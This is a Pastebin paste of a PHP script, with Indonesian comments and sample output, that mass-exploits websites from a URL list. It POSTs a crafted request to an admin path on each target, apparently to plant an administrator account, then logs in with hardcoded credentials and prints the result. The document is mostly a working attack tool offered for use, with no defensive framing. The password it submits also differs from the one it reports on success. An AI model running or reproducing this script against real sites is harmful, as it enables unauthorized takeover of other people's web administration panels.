Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- error_reporting(0);
- $get=file_get_contents($argv[1])
- or die("
- ntError !
- ntusage => php scan.php list.txtnn");
- $j=explode("rn",$get);
- foreach($j as $url){
- print "nnt[+] Exploiting => ".$url;
- $dirnya = "/login/secure/adm";
- $postdata = 'check=blalalalalalal';
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url.$dirnya);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- #Exploitasi berhasil dan memulai cek Login setelah exploitasi
- if(preg_match('#200 OK#', $result)) {
- print "nt[+] Exploiting Success, mulai mengecek login..";
- $loginpage = $url."/adm";
- $logindata = 'key=3ryAIBlm7bJ3naj9&login%5Badm_usr%5D=memek&login%5Badm_pswd%5D=memeklegit';
- $hydra_ch = curl_init();
- curl_setopt ($hydra_ch, CURLOPT_URL, $loginpage);
- curl_setopt ($hydra_ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($hydra_ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($hydra_ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($hydra_ch, CURLOPT_POSTFIELDS, $logindata);
- curl_setopt ($hydra_ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($hydra_ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($hydra_ch, CURLOPT_HEADER, 1);
- $hasil = curl_exec ($hydra_ch);
- curl_close($hydra_ch);
- if(preg_match('#302 Moved#', $hasil)) {
- print "nt[+] Login Success ! nt[+] user => memek nt[+] password => memekbau";
- print "nt[-] Login Page => ".$loginpage;
- }
- else {
- #Exploitasi berhasil dan namun admin user tidak masuk ke database.
- print "nt[-] Login Failed :( ";
- print "nt[-] Keterangan : admin user tidak masuk.n";}
- }else {
- #Exploitasi gagal total
- print "nt[-] Exploitasi Failed :(n ";}
- }
- [+] Exploiting => localhost
- [+] Exploiting Success, mulai mengecek login..
- [+] Login Success !
- [+] user => memek
- [+] password => memekbau
- [-] Login Page => localhost/adm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement